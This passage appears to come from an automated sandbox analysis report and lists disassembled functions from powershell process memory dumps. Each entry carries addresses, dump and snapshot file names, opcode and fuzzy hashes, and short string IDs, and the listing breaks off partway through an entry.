                                                              Function 00007FFB4B3153C2 Relevance: .1, Instructions: 112COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2277106319.00007FFB4B310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ffb4b310000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 882768fa714af50d4dde7aeb541e2d6012605d191b84a4032fe038fbeb252956
                                                              • Instruction ID: 62ea38de58d8f5ccb9b4ba95fef43f7a88e17393354e69f7aceb35e81f3b1f80
                                                              • Opcode Fuzzy Hash: 882768fa714af50d4dde7aeb541e2d6012605d191b84a4032fe038fbeb252956
                                                              • Instruction Fuzzy Hash: 5F3178E2D1EFC70FF3E5AF7998121B869C5AF01661B4A01FAD55DD31E3ED186C044292
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFB4B243945 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2276162493.00007FFB4B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B240000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ffb4b240000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                              • Instruction ID: 64b3bccdfdde8c2e721a3a870e79839cac5b3f0fd8a76f2c226625a8159937c3
                                                              • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                              • Instruction Fuzzy Hash: 3F01677111CB0C8FD748EF0CE451AA6B7E0FB95364F10056DE58AC3661D636E882CB45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Executed Functions

                                                              Function 02E0F258 Relevance: .3, Instructions: 281COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2050659974.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2e00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 329514051225e85b9a3006ee18a3dfa4d3fc78e88c3a49c7141004c06563dc5d
                                                              • Instruction ID: dfaea6bafec9160dae3d013ddcb91a163169c3ddbf257ee69a207966e5cf8621
                                                              • Opcode Fuzzy Hash: 329514051225e85b9a3006ee18a3dfa4d3fc78e88c3a49c7141004c06563dc5d
                                                              • Instruction Fuzzy Hash: 2BB16070E402098FDF24CFA9D88579DBBF2BF88718F14D129D815A7694EB349896CF81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02E0FB28 Relevance: .3, Instructions: 266COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2050659974.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2e00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: deef1630101c44b6b5db0e1b0d97b3ba773358be4be7adf416735a4947bea356
                                                              • Instruction ID: 6316fb453d07bc3ca6cb0d4d2908a0c5533f96b69d66e670ffc9c7d8120ec0e5
                                                              • Opcode Fuzzy Hash: deef1630101c44b6b5db0e1b0d97b3ba773358be4be7adf416735a4947bea356
                                                              • Instruction Fuzzy Hash: 03B16D70E002098FDB24CFA8D8D57DDBBF2AF88318F14D529D815A7694EB749892CF85
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 07434D70 Relevance: 10.7, Strings: 8, Instructions: 741COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2059200947.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7430000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (fl$(fl$(fl$(fl$(fl$(fl$(fl$(fl
                                                              • API String ID: 0-747792303
                                                              • Opcode ID: 1d3e0c27bfdf78b29d9bf1bed36222805cfa481f069326c580cf95a4361cd9a5
                                                              • Instruction ID: a0c186d89a1d66b8ebe13eda4ef60e83e318c1c61bd4b2642c83e8da13f080ad
                                                              • Opcode Fuzzy Hash: 1d3e0c27bfdf78b29d9bf1bed36222805cfa481f069326c580cf95a4361cd9a5
                                                              • Instruction Fuzzy Hash: 4F622B74A00204CFEB54DFA8C541BAAB7B2BF89314F25C06AD9099F356DB75EC42CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 07434728 Relevance: 8.0, Strings: 6, Instructions: 466COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2059200947.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7430000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (fl$(fl$(fl$(fl$84l$84l
                                                              • API String ID: 0-4020061531
                                                              • Opcode ID: bd1250a90f39e5f1ce2765b5d237f68ab605ddc13404a386ba2fee2f43050472
                                                              • Instruction ID: 68978135dbeba1aa1de7707c9ab02b503cb19bd62330bcefce4eaa2db44a9ac9
                                                              • Opcode Fuzzy Hash: bd1250a90f39e5f1ce2765b5d237f68ab605ddc13404a386ba2fee2f43050472
                                                              • Instruction Fuzzy Hash: F502A2B0B102459BE714DF68C850BFABBF2AF8A214F24C46AD509AF391CB35DC45CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0743DB48 Relevance: 6.0, Strings: 4, Instructions: 993COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2059200947.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7430000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (fl$(fl$XYl$XYl
                                                              • API String ID: 0-2325035120
                                                              • Opcode ID: b99107e3ef72f8e9a524300258fa68eebf2381601403563310bde4e3e048914f
                                                              • Instruction ID: 8ef367b87b292e42eec12bc04a9a464d39112020927e22bbc04695778270dbf0
                                                              • Opcode Fuzzy Hash: b99107e3ef72f8e9a524300258fa68eebf2381601403563310bde4e3e048914f
                                                              • Instruction Fuzzy Hash: D572C2B1B11215CFDB149F68C4507EABBB2AF8E210F2484ABD9199F351DB35DC42CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 07434D53 Relevance: 4.3, Strings: 3, Instructions: 557COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2059200947.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7430000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (fl$(fl$(fl
                                                              • API String ID: 0-3144609269
                                                              • Opcode ID: c63701905a45ab27c0efa397b348286ebbd24ed3668445404899f5aebb556ccb
                                                              • Instruction ID: ed3a1cb95bc0f0b59a2367315ee8a8aa6d21e66fc4ac588b5ab703bfa2f5ba26
                                                              • Opcode Fuzzy Hash: c63701905a45ab27c0efa397b348286ebbd24ed3668445404899f5aebb556ccb
                                                              • Instruction Fuzzy Hash: EF322AB4A10214CFEB54CF58C541AAAF7B2BF89314F15C19AD909AF356C776EC42CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 074354E5 Relevance: 4.2, Strings: 3, Instructions: 483COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2059200947.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7430000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (fl$(fl$(fl
                                                              • API String ID: 0-3144609269
                                                              • Opcode ID: ef3c2d1c726d53a2b4a5ad8157a5c3877e4cfab132d656871d9c401aab11e056
                                                              • Instruction ID: ca3b1c5b7fa7b98c940e84cca7049a7fe4fc864de4bb9022b990d8fd624eecde
                                                              • Opcode Fuzzy Hash: ef3c2d1c726d53a2b4a5ad8157a5c3877e4cfab132d656871d9c401aab11e056
                                                              • Instruction Fuzzy Hash: 4B1217B4A10205CFEB14CFA4C541AAAF7B2BB89314F25C05AE9099F356D776EC46CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0743C611 Relevance: 2.9, Strings: 2, Instructions: 397COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2059200947.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7430000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (fl$(fl
                                                              • API String ID: 0-1194790885
                                                              • Opcode ID: e0834e26a5f484ad391cc8fbd0b177b4cf3c3a889d7848d377d8441683643796
                                                              • Instruction ID: 567a1f48fe6140672d3c37bc9d909b1246f4d590529e97c9273ab2e45b376c90
                                                              • Opcode Fuzzy Hash: e0834e26a5f484ad391cc8fbd0b177b4cf3c3a889d7848d377d8441683643796
                                                              • Instruction Fuzzy Hash: D40220B4A00219DFEB24DF54C954BEAB7B2AB89304F10C1E6D9096F391CB75EE818F51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 074362AB Relevance: 2.9, Strings: 2, Instructions: 387COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2059200947.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7430000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (fl$(fl
                                                              • API String ID: 0-1194790885
                                                              • Opcode ID: 8ac1303d3566ee2d024262f1f78cbeacbb428e5804a57c78e49baadcdea85ac5
                                                              • Instruction ID: 7dede6a7bb9397103e21a7efe21b14a195ce08747c429abb90a9cb9642f2d2ac
                                                              • Opcode Fuzzy Hash: 8ac1303d3566ee2d024262f1f78cbeacbb428e5804a57c78e49baadcdea85ac5
                                                              • Instruction Fuzzy Hash: CAF1A070A002159FEB64DB18C950FAEB7B3AF89304F15C0AAD5096F395CB35ED818F92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 07436878 Relevance: 1.7, Strings: 1, Instructions: 441COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2059200947.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7430000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (fl
                                                              • API String ID: 0-423539152
                                                              • Opcode ID: 73a0ed453963213b79d7114799ccd65de35dbbf527d5c5931dbe94223700d5bd
                                                              • Instruction ID: 8e5441b4f95c99faa877d8fcd5d7995584f88ffd195a712d587f4ed63fe50814
                                                              • Opcode Fuzzy Hash: 73a0ed453963213b79d7114799ccd65de35dbbf527d5c5931dbe94223700d5bd
                                                              • Instruction Fuzzy Hash: BC02B074A002059FEB14DF58C940BAEB7B2AF8A314F25C49AD5096F355CB36EC46CF92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0743B900 Relevance: 1.6, Strings: 1, Instructions: 363COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2059200947.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7430000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (fl
                                                              • API String ID: 0-423539152
                                                              • Opcode ID: 3f6369eb4a71455a3723a42a12d992deed81d4aa0e8e5a6a819bd8a9a39a6a88
                                                              • Instruction ID: 21fa3a9fd828abe9ca7664cbc49619d75eb42f9eb7e5b2f06172c34c07d09b2f
                                                              • Opcode Fuzzy Hash: 3f6369eb4a71455a3723a42a12d992deed81d4aa0e8e5a6a819bd8a9a39a6a88
                                                              • Instruction Fuzzy Hash: B1E151B0A002149FEB24DB68C955BAEB7F2AB89704F10C499D9096F391CB75ED818F91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0743E454 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2059200947.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7430000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (fl
                                                              • API String ID: 0-423539152
                                                              • Opcode ID: 8a44474ff635c89d847fcb88f0d63b879c3f70512de5ec28782941d6515be2e4
                                                              • Instruction ID: e490a58aebd4fa608f7998159d87b0d6efb6caacb026f8c48a6d253547427c5f
                                                              • Opcode Fuzzy Hash: 8a44474ff635c89d847fcb88f0d63b879c3f70512de5ec28782941d6515be2e4
                                                              • Instruction Fuzzy Hash: 1C812BB4A11215DFDB14CF54C550AAAB7F2AF8D324F29C19AD908AB351D732EC42CF61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 07432F03 Relevance: 1.5, Strings: 1, Instructions: 208COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2059200947.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7430000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 84l
                                                              • API String ID: 0-1480273888
                                                              • Opcode ID: f9e8224db2062a4f2a7cf6db47f27ceb0447e069973ac6893143dcf393faff69
                                                              • Instruction ID: 636e179074abc7b7f7d95a64892c06bc92e9f04fcfa97a4898442977e72a8bfc
                                                              • Opcode Fuzzy Hash: f9e8224db2062a4f2a7cf6db47f27ceb0447e069973ac6893143dcf393faff69
                                                              • Instruction Fuzzy Hash: E051F8B06093819FD7128B64C8606A6BF71AF8B214F19C4DBD588DF2A3C775CD46C7A2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0743E468 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2059200947.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7430000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (fl
                                                              • API String ID: 0-423539152
                                                              • Opcode ID: 1ba2c69ba6d61443b907f3e91390c77e1cd6b6e214b9f8e4fd0795754393f46b
                                                              • Instruction ID: 8fc0f5fd1ade83bae8ea3ee089d6be0b56cb3b1e7416fd84c637cdf98d857fd4
                                                              • Opcode Fuzzy Hash: 1ba2c69ba6d61443b907f3e91390c77e1cd6b6e214b9f8e4fd0795754393f46b
                                                              • Instruction Fuzzy Hash: 8E813BB4A11215DFDB14CF54C554AAAB7F2AF8D324F25C15AD908AB351C732EC42CF60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 07435898 Relevance: 1.1, Instructions: 1069COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2059200947.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7430000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 02c393fc48d8eb0ed8e087691ed0b2ccba8868b8830be80f1a4929e1c3ec1a19
                                                              • Instruction ID: 163146e9d86af260e915ecf6b6ddd14311d5b1f5911e3f5029f584ebff10da5c
                                                              • Opcode Fuzzy Hash: 02c393fc48d8eb0ed8e087691ed0b2ccba8868b8830be80f1a4929e1c3ec1a19
                                                              • Instruction Fuzzy Hash: E992C470B102159FEB14DF64C850BAEBBB2AF8A314F25C4AAD5096F391CB35DC46CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0743B1DD Relevance: .7, Instructions: 704COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2059200947.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7430000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 98551ec5227021bf9f826bc75a26aa137d929adac3a59f5fb9b460eb9ed1e292
                                                              • Instruction ID: ce0f80c74e5366e9c1d633ae0fcc9e9a187f9f1e38692fdb437b3a8285743f9a
                                                              • Opcode Fuzzy Hash: 98551ec5227021bf9f826bc75a26aa137d929adac3a59f5fb9b460eb9ed1e292
                                                              • Instruction Fuzzy Hash: 156220B4A002189FEB14DB64C954BEEB7B2AB89704F10C4D6D9096F391CB35EE81CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 08106240 Relevance: .4, Instructions: 435COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2063679057.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_8100000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 213e9ace3c05e25f7f2839bf460b6212ae81a6be4875efa14a6555d31a9d2f52
                                                              • Instruction ID: 228e6ed94942f40220fb6f3155bd1bd186885f78c94608bcafcb318e1dd3413c
                                                              • Opcode Fuzzy Hash: 213e9ace3c05e25f7f2839bf460b6212ae81a6be4875efa14a6555d31a9d2f52
                                                              • Instruction Fuzzy Hash: 33020774A00219DFDB15CF98D884AAEBBB2FF88311F248159E805AB395C775ED91CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02E09998 Relevance: .4, Instructions: 385COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2050659974.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2e00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c55a0edb4a32d61f872e04e090d259695b1b3551d67c4513b11cd4ff904771dd
                                                              • Instruction ID: 88bc88489c5b007692710a6f0d2283750252a0fd3ac92bfc363d70e9d88f76e2
                                                              • Opcode Fuzzy Hash: c55a0edb4a32d61f872e04e090d259695b1b3551d67c4513b11cd4ff904771dd
                                                              • Instruction Fuzzy Hash: 61E159357002009FDB08DF68C494AADBBF2FF89714B2485A9E8059F762DB35EC46CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 07430638 Relevance: .3, Instructions: 325COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2059200947.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7430000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a0b20152550ce9b814c5a1a790332bf933b94b0933ffdc6b48d85828400ba151
                                                              • Instruction ID: 0281edb764645ff93e474c28c7556120c193c0f70d7267a03eca310ef34865c8
                                                              • Opcode Fuzzy Hash: a0b20152550ce9b814c5a1a790332bf933b94b0933ffdc6b48d85828400ba151
                                                              • Instruction Fuzzy Hash: 73B1FAB1704206DFEB149B68D4007EBBBA7EFC9211F14856BD80D8B361DB31C842C7A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02E03670 Relevance: .3, Instructions: 308COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2050659974.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2e00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba3b716bdaaf4b196887adf3ea5a2fc255e86001b2c8da509fb65ff1a9583976
                                                              • Instruction ID: d4db12b57b9f62dcc0a7345f1a03e8a615aaa8c1e6cbd6522ccb429269c6653c
                                                              • Opcode Fuzzy Hash: ba3b716bdaaf4b196887adf3ea5a2fc255e86001b2c8da509fb65ff1a9583976
                                                              • Instruction Fuzzy Hash: 97D1F574A012489FDB15CFA8D484A9DFBB2FF88314F24C199E805AB395C735ED86CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02E0F24C Relevance: .3, Instructions: 280COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2050659974.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2e00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 344c2ebbfb170c94e45b8f8f66604def8f2e55752b038a54a360407923de1d18
                                                              • Instruction ID: cb37c4bd75b34a9e247452c781c028530412dea277ca264dc2d52da53bfdbe98
                                                              • Opcode Fuzzy Hash: 344c2ebbfb170c94e45b8f8f66604def8f2e55752b038a54a360407923de1d18
                                                              • Instruction Fuzzy Hash: 42B15C70E402098FDB20CFA9D8857DDBBF1BF88718F14D129E815A7694EB349896CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02E0FB1D Relevance: .3, Instructions: 267COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2050659974.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2e00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 77d451a577d606959b6b3df549a11aadd255d0b7b8e3d0d695d3364694f869f9
                                                              • Instruction ID: 4c5e3f169571b7ab189a952796b5a6279e9d854f61b696d67f9fe72c37aaa3c2
                                                              • Opcode Fuzzy Hash: 77d451a577d606959b6b3df549a11aadd255d0b7b8e3d0d695d3364694f869f9
                                                              • Instruction Fuzzy Hash: CAB16C70E402098FDB20CFA8D8C57DDBBF1AF88318F249529D814E7694EB759892CF85
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02E08D38 Relevance: .3, Instructions: 266COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2050659974.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2e00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1375240258089986e815dee4a9abdcbe3ad6a0aa5498e667cebdddee3e31d0a6
                                                              • Instruction ID: a7fd3d4ef04a64b05b6c216e4ec2a29ae77da5846420fb9f3905ce68a7340f8a
                                                              • Opcode Fuzzy Hash: 1375240258089986e815dee4a9abdcbe3ad6a0aa5498e667cebdddee3e31d0a6
                                                              • Instruction Fuzzy Hash: C9A19331B00208DFDB14DFA4D584A9DB7B2FF85704F119559E406AF3A6CB34AD8ACB80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 07436C10 Relevance: .3, Instructions: 257COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2059200947.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7430000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 85e180310a98719b58c64f039241633639d4f651374a10d752af5c183fdff560
                                                              • Instruction ID: 4b9a4d397a32d41a5bbb0f19e1d4b86e6f3976bffa01dc83f0b43746bf51b9fd
                                                              • Opcode Fuzzy Hash: 85e180310a98719b58c64f039241633639d4f651374a10d752af5c183fdff560
                                                              • Instruction Fuzzy Hash: 0FA1A0B0A102059FEB14DF54C545BAEBBB2AF8D304F25C45AD9092F395CB36EC46CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 074308C2 Relevance: .2, Instructions: 250COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2059200947.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7430000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cbc640fa3d86770c8f780e00f6579999f68f7c0bde29c182c592f6a0f4345668
                                                              • Instruction ID: 301a47f646e9579f0703b933f06f9fbade25264f4b81b736abf2b37bc8f3be35
                                                              • Opcode Fuzzy Hash: cbc640fa3d86770c8f780e00f6579999f68f7c0bde29c182c592f6a0f4345668
                                                              • Instruction Fuzzy Hash: 428147727043468FD7155B6898103ABBBA7EFCA211F2485ABD899CB372C735C845C7A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02E08528 Relevance: .2, Instructions: 228COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2050659974.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2e00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6ae5c3f6ceba82511b8ea085a5e74d0b1d2d12d116b3bfeef7a2b2bd4e4c19cf
                                                              • Instruction ID: 7af773c9468a883a497d1c42322245cd57a9cc162edebe1ca9c0e1284db64322
                                                              • Opcode Fuzzy Hash: 6ae5c3f6ceba82511b8ea085a5e74d0b1d2d12d116b3bfeef7a2b2bd4e4c19cf
                                                              • Instruction Fuzzy Hash: C891A234A003049FC715DFA4D884AADBBF2FF89314F1985A9E4459B7A1CB35EC86CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02E02B48 Relevance: .2, Instructions: 216COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2050659974.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2e00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5505b47be1eb4b3cc386894972943eb6d8db1b46fed144f3c42b1fcc0ec478b4
                                                              • Instruction ID: eebf6f269c11afbef6328105e16f04d76c81160a457100727633bb26ce0d2915
                                                              • Opcode Fuzzy Hash: 5505b47be1eb4b3cc386894972943eb6d8db1b46fed144f3c42b1fcc0ec478b4
                                                              • Instruction Fuzzy Hash: 25918074A006058FCB05CF58C4D4AAAFBF1FF89314B24859AD915AB7A5C735FC91CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02E09488 Relevance: .2, Instructions: 193COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2050659974.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2e00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
